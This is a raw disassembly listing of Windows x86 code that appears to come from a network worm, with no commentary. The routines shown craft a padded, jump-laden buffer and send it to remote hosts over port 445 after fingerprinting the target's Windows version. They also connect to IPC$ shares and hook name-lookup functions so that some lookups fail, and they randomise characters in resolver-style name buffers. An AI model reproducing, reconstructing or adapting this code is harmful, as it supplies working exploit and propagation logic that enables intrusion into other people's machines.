idiv ecx
mov ecx, [ebp+var_8]
lea eax, [edx+42h]
mov edx, [ebp+var_4]
cmp ecx, edx
mov [edx], ax
jnb short loc_9AAA4E
loc_9AAA42: ; CODE XREF: sub_9AA8E9+163�j
cmp [ecx], ax
jz short loc_9AAA26
inc ecx
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_9AAA42
loc_9AAA4E: ; CODE XREF: sub_9AA8E9+157�j
inc [ebp+arg_0]
add [ebp+var_4], 2
inc esi
inc esi
cmp [ebp+arg_0], 6
jb short loc_9AAA26
mov dword ptr [esi+edi], 20408h
add esi, 4
cmp [ebp+arg_C], 6
jz loc_9AAB06
cmp [ebp+arg_C], 7
jz loc_9AAB06
mov eax, [ebx+0Ch]
and [ebp+var_8], 0
test eax, eax
jnz short loc_9AAA89
loc_9AAA86: ; CODE XREF: sub_9AA8E9+224�j
mov eax, [ebx+8]
loc_9AAA89: ; CODE XREF: sub_9AA8E9+19B�j
mov [esi+edi], eax
add esi, 4
lea eax, [esi+46h]
cmp esi, eax
mov [ebp+arg_0], esi
jnb short loc_9AAAB9
loc_9AAA99: ; CODE XREF: sub_9AA8E9+1CE�j
call rand
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add dl, 41h
inc [ebp+arg_0]
mov [eax+edi], dl
lea eax, [esi+46h]
cmp [ebp+arg_0], eax
jb short loc_9AAA99
loc_9AAAB9: ; CODE XREF: sub_9AA8E9+1AE�j
add esi, edi
cmp [ebp+var_8], 0
jz short loc_9AAB12
lea eax, [ebx+8]
mov ecx, [eax]
mov [esi], ecx
mov ecx, [eax]
mov [esi+4], ecx
mov ecx, [eax]
mov [esi+8], ecx
mov ecx, [eax]
mov [esi+0Ch], ecx
mov eax, [eax]
mov [esi+10h], eax
mov eax, [ebx+0Ch]
mov [esi+14h], eax
mov eax, [ebx+14h]
mov [esi+18h], eax
mov eax, [ebx+10h]
mov [esi+38h], eax
mov eax, [ebx+10h]
mov [esi+3Ch], eax
mov byte ptr [esi+40h], 0EBh
mov byte ptr [esi+41h], 2
mov byte ptr [esi+44h], 0EBh
mov byte ptr [esi+45h], 58h
jmp short loc_9AAB40
; ---------------------------------------------------------------------------
loc_9AAB06: ; CODE XREF: sub_9AA8E9+182�j
; sub_9AA8E9+18C�j
mov [ebp+var_8], 1
jmp loc_9AAA86
; ---------------------------------------------------------------------------
loc_9AAB12: ; CODE XREF: sub_9AA8E9+1D6�j
mov eax, [ebx+8]
push 8 ; Size
mov [esi+4], eax
lea eax, [esi+32h]
push offset dword_9A402C ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+3Ah], 0EBh
cmp dword ptr [ebx+0Ch], 0
setnz al
lea eax, ds:5Ah[eax*8]
mov [esi+3Bh], al
loc_9AAB40: ; CODE XREF: sub_9AA8E9+21B�j
and word ptr [esi+46h], 0
push offset dword_9A401C ; Endpoint
lea eax, [ebp+NetworkAddr]
push eax ; NetworkAddr
push edi ; int
call sub_9AA82D
push edi ; lpMem
mov esi, eax
call sub_9AC755
add esp, 10h
mov eax, esi
loc_9AAB64: ; CODE XREF: sub_9AA8E9+A4�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AA8E9 endp
; =============== S U B R O U T I N E =======================================
sub_9AAB69 proc near ; CODE XREF: sub_9AABAE+70�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 1BDh ; netshort
push [esp+4+arg_0] ; int
call sub_9AF52D
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_9AABAB
dec eax
dec eax
jz short loc_9AAB9F
dec eax
jz short loc_9AAB9B
dec eax
jz short loc_9AAB97
dec eax
jz short loc_9AAB93
dec eax
jnz short loc_9AABAB
push 7
loc_9AAB90: ; CODE XREF: sub_9AAB69+2C�j
; sub_9AAB69+30�j ...
pop eax
jmp short loc_9AABA1
; ---------------------------------------------------------------------------
loc_9AAB93: ; CODE XREF: sub_9AAB69+20�j
push 6
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB97: ; CODE XREF: sub_9AAB69+1D�j
push 5
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB9B: ; CODE XREF: sub_9AAB69+1A�j
push 2
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB9F: ; CODE XREF: sub_9AAB69+17�j
xor eax, eax
loc_9AABA1: ; CODE XREF: sub_9AAB69+28�j
mov ecx, [esp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AABAB: ; CODE XREF: sub_9AAB69+13�j
; sub_9AAB69+23�j
xor eax, eax
retn
sub_9AAB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
; int __cdecl sub_9AABAE(u_long netlong,void *Src,size_t Size)
sub_9AABAE proc near ; CODE XREF: sub_9A8F12+D�p
; sub_9AD6D4+F2�p ...
Name = byte ptr -188h
VersionInformation= _OSVERSIONINFOA ptr -124h
var_90 = word ptr -90h
NetworkAddr = byte ptr -88h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
netlong = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 188h
push ebx
mov ebx, [ebp+6Ch+netlong]
push esi
mov esi, _snprintf
mov eax, ebx
shr eax, 18h
push eax
movzx eax, byte ptr [ebp+6Ch+netlong+2]
push eax
movzx eax, bh
push eax
mov eax, ebx
and eax, 0FFh
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea eax, [ebp+6Ch+NetworkAddr]
push 80h ; Count
push eax ; Dest
call esi ; _snprintf
push ebx ; netlong
mov [ebp+6Ch+var_9], 0
call sub_9A9DA6
add esp, 20h
test eax, eax
jnz loc_9AAD02
or [ebp+6Ch+var_4], 0FFFFFFFFh
push ebx ; netlong
call sub_9B0191
movzx eax, ax
test eax, eax
pop ecx
mov [ebp+6Ch+var_8], eax
jz loc_9AAD02
lea eax, [ebp+6Ch+var_4]
push eax
push ebx
call sub_9AAB69
test eax, eax
pop ecx
pop ecx
jz loc_9AAD02
lea eax, [ebp+6Ch+NetworkAddr]
push eax
call sub_9AA736
pop ecx
push 2
pop ebx
cmp [ebp+6Ch+var_4], ebx
jnz loc_9AACC4
lea eax, [ebp+6Ch+NetworkAddr]
push offset Endpoint ; Endpoint
push eax ; NetworkAddr
call sub_9AA799
test eax, eax
pop ecx
pop ecx
jnz short loc_9AACC4
push edi
push 26h
pop ecx
mov [ebp+6Ch+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+6Ch+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+6Ch+VersionInformation]
push eax ; lpVersionInformation
call GetVersionExA
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], 5
push 6
pop edi
jnz short loc_9AAC9F
cmp [ebp+6Ch+VersionInformation.dwMinorVersion], 1
jnz short loc_9AACAA
cmp [ebp+6Ch+var_90], bx
jbe short loc_9AAC99
push 8
jmp short loc_9AACA9
; ---------------------------------------------------------------------------
loc_9AAC99: ; CODE XREF: sub_9AABAE+E5�j
jnz short loc_9AACAA
mov edi, ebx
jmp short loc_9AACAA
; ---------------------------------------------------------------------------
loc_9AAC9F: ; CODE XREF: sub_9AABAE+D6�j
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], edi
jb short loc_9AACAA
push 7
loc_9AACA9: ; CODE XREF: sub_9AABAE+E9�j
pop edi
loc_9AACAA: ; CODE XREF: sub_9AABAE+DF�j
; sub_9AABAE:loc_9AAC99�j ...
call rand
cdq
push 0Ah
pop ecx
idiv ecx
xor eax, eax
cmp edx, edi
setl al
pop edi
add eax, 3
mov [ebp+6Ch+var_4], eax
loc_9AACC4: ; CODE XREF: sub_9AABAE+8F�j
; sub_9AABAE+A7�j
push [ebp+6Ch+var_8] ; int
push [ebp+6Ch+var_4] ; int
push [ebp+6Ch+Size] ; Size
push [ebp+6Ch+Src] ; Src
push [ebp+6Ch+netlong] ; int
call sub_9AA8E9
lea eax, [ebp+6Ch+NetworkAddr]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+6Ch+Name]
push 100h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 24h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+6Ch+Name]
push eax ; lpName
call WNetCancelConnection2A
loc_9AAD02: ; CODE XREF: sub_9AABAE+4C�j
; sub_9AABAE+65�j ...
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_9AABAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAD09(wchar_t *Str)
sub_9AAD09 proc near ; CODE XREF: sub_9AAD64+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Str = dword ptr 8
push 0Ch
push offset stru_9A4070
call __SEH_prolog
mov [ebp+var_1C], 1
xor esi, esi
mov [ebp+ms_exc.disabled], esi
cmp [ebp+Str], esi
jz short loc_9AAD57
push offset a__ ; "\\..\\"
push [ebp+Str] ; Str
call wcsstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AAD4B
push [ebp+Str] ; Str
call wcslen
pop ecx
cmp eax, 0C8h
jbe short loc_9AAD57
loc_9AAD4B: ; CODE XREF: sub_9AAD09+2F�j
mov [ebp+var_1C], esi
jmp short loc_9AAD57
; ---------------------------------------------------------------------------
loc_9AAD50: ; DATA XREF: .text:stru_9A4070�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAD54: ; DATA XREF: .text:stru_9A4070�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAD57: ; CODE XREF: sub_9AAD09+1B�j
; sub_9AAD09+40�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAD09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAD64(wchar_t *Str,int,int,int,int,int)
sub_9AAD64 proc near ; DATA XREF: sub_9AB47D+5�o
Str = dword ptr 8
push ebp
mov ebp, esp
cmp lpAddress, 0
jz short loc_9AAD86
push [ebp+Str] ; Str
call sub_9AAD09
test eax, eax
pop ecx
jnz short loc_9AAD95
push [ebp+Str]
call sub_9A9067
pop ecx
loc_9AAD86: ; CODE XREF: sub_9AAD64+A�j
push 57h ; dwErrCode
call SetLastError
push 57h
pop eax
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_9AAD95: ; CODE XREF: sub_9AAD64+17�j
mov eax, lpAddress
add eax, 4
pop ebp
jmp eax
sub_9AAD64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AADA0 proc near ; CODE XREF: sub_9AADCD+3E�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_9A4080
call __SEH_prolog
mov eax, [ebp+arg_0]
and [ebp+ms_exc.disabled], 0
mov cl, [eax]
or cl, 70h
mov [eax], cl
jmp short loc_9AADC3
; ---------------------------------------------------------------------------
loc_9AADBC: ; DATA XREF: .text:stru_9A4080�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AADC0: ; DATA XREF: .text:stru_9A4080�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AADC3: ; CODE XREF: sub_9AADA0+1A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AADA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AADCD proc near ; DATA XREF: sub_9AB49A+5�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, dword_9BB190
test eax, eax
jz short loc_9AAE16
push esi
push [ebp+arg_10]
add eax, 4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
cmp [ebp+arg_4], 22h
mov esi, eax
jnz short loc_9AAE11
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_9AAE11
cmp [ebp+arg_8], 0
jz short loc_9AAE11
cmp [ebp+arg_C], 0
jz short loc_9AAE11
push [ebp+arg_8]
call sub_9AADA0
pop ecx
loc_9AAE11: ; CODE XREF: sub_9AADCD+27�j
; sub_9AADCD+2D�j ...
mov eax, esi
pop esi
jmp short loc_9AAE19
; ---------------------------------------------------------------------------
loc_9AAE16: ; CODE XREF: sub_9AADCD+A�j
push 57h
pop eax
loc_9AAE19: ; CODE XREF: sub_9AADCD+47�j
pop ebp
retn 14h
sub_9AADCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAE1D(char *lpFirst)
sub_9AAE1D proc near ; CODE XREF: sub_9AAE58+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFirst = dword ptr 8
push 0Ch
push offset stru_9A4090
call __SEH_prolog
xor eax, eax
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpFirst], eax
jz short loc_9AAE4B
push [ebp+lpFirst] ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAE4B
; ---------------------------------------------------------------------------
loc_9AAE44: ; DATA XREF: .text:stru_9A4090�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAE48: ; DATA XREF: .text:stru_9A4090�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAE4B: ; CODE XREF: sub_9AAE1D+17�j
; sub_9AAE1D+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAE1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAE58(char *lpFirst,int,int,int,int,int)
sub_9AAE58 proc near ; DATA XREF: sub_9AB4B7+9�o
lpFirst = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB194, 0
jz short loc_9AAE7C
push [ebp+lpFirst] ; lpFirst
call sub_9AAE1D
test eax, eax
pop ecx
jnz short loc_9AAE7C
mov eax, dword_9BB194
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAE7C: ; CODE XREF: sub_9AAE58+A�j
; sub_9AAE58+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAE58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAE90(LPCSTR lpMultiByteStr)
sub_9AAE90 proc near ; CODE XREF: sub_9AAF13+F�p
WideCharStr = word ptr -31Ch
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpMultiByteStr = dword ptr 8
push 30Ch
push offset stru_9A40A0
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+ms_exc.disabled], edi
cmp [ebp+lpMultiByteStr], edi
jz short loc_9AAF06
mov esi, 100h
push esi ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push edi ; dwFlags
push 0FDE9h ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9AAF06
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push edi ; dwFlags
push edi ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9AAF06
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAF06
; ---------------------------------------------------------------------------
loc_9AAEFF: ; DATA XREF: .text:stru_9A40A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAF03: ; DATA XREF: .text:stru_9A40A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAF06: ; CODE XREF: sub_9AAE90+1A�j
; sub_9AAE90+3C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAE90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAF13(LPCSTR lpMultiByteStr,int,int,int,int,int)
sub_9AAF13 proc near ; DATA XREF: sub_9AB4B7+23�o
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB198, 0
jz short loc_9AAF37
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_9AAE90
test eax, eax
pop ecx
jnz short loc_9AAF37
mov eax, dword_9BB198
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAF37: ; CODE XREF: sub_9AAF13+A�j
; sub_9AAF13+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAF13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAF4B(LPCWSTR lpWideCharStr)
sub_9AAF4B proc near ; CODE XREF: sub_9AAFA9+F�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpWideCharStr = dword ptr 8
push 10Ch
push offset stru_9A40B0
call __SEH_prolog
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpWideCharStr], eax
jz short loc_9AAF9C
push eax ; lpUsedDefaultChar
push eax ; lpDefaultChar
push 100h ; cbMultiByte
lea ecx, [ebp+First]
push ecx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push eax ; dwFlags
push eax ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9AAF9C
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAF9C
; ---------------------------------------------------------------------------
loc_9AAF95: ; DATA XREF: .text:stru_9A40B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAF99: ; DATA XREF: .text:stru_9A40B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAF9C: ; CODE XREF: sub_9AAF4B+17�j
; sub_9AAF4B+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
inc eax
call __SEH_epilog
retn
sub_9AAF4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAFA9(LPCWSTR lpWideCharStr,int,int,int,int,int)
sub_9AAFA9 proc near ; DATA XREF: sub_9AB4B7+3A�o
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB19C, 0
jz short loc_9AAFCD
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_9AAF4B
test eax, eax
pop ecx
jnz short loc_9AAFCD
mov eax, dword_9BB19C
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAFCD: ; CODE XREF: sub_9AAFA9+A�j
; sub_9AAFA9+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAFA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AAFE1 proc near ; CODE XREF: .text:009AB057�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10Ch
push offset stru_9A40C0
call __SEH_prolog
mov eax, [ebp+arg_0]
xor ecx, ecx
mov [ebp+var_1C], ecx
mov [ebp+ms_exc.disabled], ecx
cmp eax, ecx
jz short loc_9AB03B
mov eax, [eax]
cmp eax, ecx
jz short loc_9AB03B
push ecx ; lpUsedDefaultChar
push ecx ; lpDefaultChar
push 100h ; cbMultiByte
lea edx, [ebp+First]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push eax ; lpWideCharStr
push ecx ; dwFlags
push ecx ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9AB03B
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AB03B
; ---------------------------------------------------------------------------
loc_9AB034: ; DATA XREF: .text:stru_9A40C0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB038: ; DATA XREF: .text:stru_9A40C0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB03B: ; CODE XREF: sub_9AAFE1+1C�j
; sub_9AAFE1+22�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn 4
sub_9AAFE1 endp
; ---------------------------------------------------------------------------
loc_9AB04A: ; DATA XREF: sub_9AB4B7+51�o
cmp dword_9BB1A0, 0
jz short loc_9AB06A
push dword ptr [esp+4]
call sub_9AAFE1
test eax, eax
jnz short loc_9AB06A
mov eax, dword_9BB1A0
add eax, 4
jmp eax
; ---------------------------------------------------------------------------
loc_9AB06A: ; CODE XREF: .text:009AB051�j
; .text:009AB05E�j
push 5B4h
call SetLastError
mov eax, 5B4h
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB07D proc near ; CODE XREF: sub_9AB296+12�p
Dst = dword ptr -244h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 234h
push offset stru_9A40D0
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
call GetCurrentProcessId
push eax ; th32ProcessID
push 8 ; dwFlags
call CreateToolhelp32Snapshot
mov edi, eax
mov [ebp+var_20], edi
cmp edi, 0FFFFFFFFh
jz short loc_9AB123
mov esi, 224h
push esi ; Size
push ebx ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
add esp, 0Ch
mov [ebp+Dst], esi
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32First
jmp short loc_9AB10F
; ---------------------------------------------------------------------------
loc_9AB0D7: ; CODE XREF: sub_9AB07D+94�j
mov eax, [ebp+var_230]
cmp [ebp+arg_0], eax
jb short loc_9AB102
mov ecx, [ebp+var_22C]
add ecx, eax
cmp [ebp+arg_0], ecx
jnb short loc_9AB102
cmp [ebp+arg_4], ebx
jz short loc_9AB0F9
cmp eax, [ebp+arg_4]
jnz short loc_9AB102
loc_9AB0F9: ; CODE XREF: sub_9AB07D+75�j
mov [ebp+var_1C], 1
jmp short loc_9AB113
; ---------------------------------------------------------------------------
loc_9AB102: ; CODE XREF: sub_9AB07D+63�j
; sub_9AB07D+70�j ...
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32Next
loc_9AB10F: ; CODE XREF: sub_9AB07D+58�j
test eax, eax
jnz short loc_9AB0D7
loc_9AB113: ; CODE XREF: sub_9AB07D+83�j
push edi ; hObject
call CloseHandle
jmp short loc_9AB123
; ---------------------------------------------------------------------------
loc_9AB11C: ; DATA XREF: .text:stru_9A40D0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB120: ; DATA XREF: .text:stru_9A40D0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB123: ; CODE XREF: sub_9AB07D+2D�j
; sub_9AB07D+9D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AB07D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB130 proc near ; CODE XREF: sub_9AB1C8+65�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 18h
push offset stru_9A40E0
call __SEH_prolog
xor edi, edi
mov [ebp+var_24], edi
mov [ebp+ms_exc.disabled], edi
mov esi, [ebp+arg_0]
add esi, 0Ch
mov [ebp+var_1C], esi
loc_9AB14D: ; CODE XREF: sub_9AB130+95�j
mov [ebp+var_20], edi
loc_9AB150: ; CODE XREF: sub_9AB130+8B�j
cmp edi, [ebp+arg_C]
jnb short loc_9AB169
mov al, [esi]
test al, al
jnz short loc_9AB17B
mov [ebp+var_24], 1
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 0
loc_9AB169: ; CODE XREF: sub_9AB130+23�j
; sub_9AB130+5D�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_24]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9AB17B: ; CODE XREF: sub_9AB130+29�j
movsx ebx, al
mov [ebp+var_28], ebx
inc esi
mov [ebp+var_1C], esi
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AB169
push ebx ; Size
push esi ; Src
mov eax, [ebp+arg_8]
add eax, edi
push eax ; Dst
call memcpy
add esp, 0Ch
add esi, ebx
mov [ebp+var_1C], esi
add edi, ebx
mov [ebp+var_20], edi
cmp edi, [ebp+arg_C]
jnb short loc_9AB169
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AB169
cmp byte ptr [esi], 0
jz short loc_9AB150
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 2Eh
inc edi
jmp short loc_9AB14D
sub_9AB130 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB1C8 proc near ; CODE XREF: sub_9AB296+23�p
First = byte ptr -128h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 118h
push offset stru_9A40F0
call __SEH_prolog
mov esi, edx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov [ebp+var_20], esi
mov al, [esi+2]
test al, 78h
jnz loc_9AB28C
test al, 1
jz loc_9AB28C
cmp [esi+6], di
jnz loc_9AB28C
cmp [esi+8], di
jnz loc_9AB28C
cmp [esi+0Ah], di
jnz short loc_9AB28C
cmp byte ptr [esi+ecx-5], 0
jnz short loc_9AB28C
cmp dword ptr [esi+ecx-4], 1000100h
jnz short loc_9AB28C
push 104h
lea eax, [ebp+First]
push eax
push ecx
push esi
call sub_9AB130
add esp, 10h
test eax, eax
jz short loc_9AB28C
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
test eax, eax
jz short loc_9AB28C
lea eax, [ebp+First]
push eax ; Str
call strlen
pop ecx
mov ebx, eax
mov [ebp+var_24], ebx
mov [ebp+var_1C], edi
loc_9AB25F: ; CODE XREF: sub_9AB1C8+B6�j
cmp [ebp+var_1C], ebx
jnb short loc_9AB280
call rand
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_1C]
mov [eax+esi+0Dh], dl
inc [ebp+var_1C]
jmp short loc_9AB25F
; ---------------------------------------------------------------------------
loc_9AB280: ; CODE XREF: sub_9AB1C8+9A�j
mov [esi+0Ch], bl
jmp short loc_9AB28C
; ---------------------------------------------------------------------------
loc_9AB285: ; DATA XREF: .text:stru_9A40F0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB289: ; DATA XREF: .text:stru_9A40F0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB28C: ; CODE XREF: sub_9AB1C8+1E�j
; sub_9AB1C8+26�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AB1C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB296 proc near ; DATA XREF: sub_9AB535+1A�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 12h
jl short loc_9AB2BE
push dword_9BB1A8
push dword ptr [ebp+4]
call sub_9AB07D
test eax, eax
pop ecx
pop ecx
jz short loc_9AB2BE
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
call sub_9AB1C8
loc_9AB2BE: ; CODE XREF: sub_9AB296+7�j
; sub_9AB296+1B�j
mov eax, dword_9BB1A4
add eax, 4
pop ebp
jmp eax
sub_9AB296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB2C9(LPVOID lpAddress)
sub_9AB2C9 proc near ; CODE XREF: sub_9AB408+51�p
Src = byte ptr -40h
var_3F = dword ptr -3Fh
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
nPriority = dword ptr -28h
flOldProtect = dword ptr -24h
var_20 = dword ptr -20h
hThread = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpAddress = dword ptr 8
push 30h
push offset stru_9A4100
call __SEH_prolog
mov esi, ecx
mov edi, edx
xor ebx, ebx
mov [ebp+var_2C], ebx
call GetCurrentThread
mov [ebp+hThread], eax
push eax ; hThread
call GetThreadPriority
mov [ebp+nPriority], eax
mov [ebp+ms_exc.disabled], ebx
push 2Ch ; Size
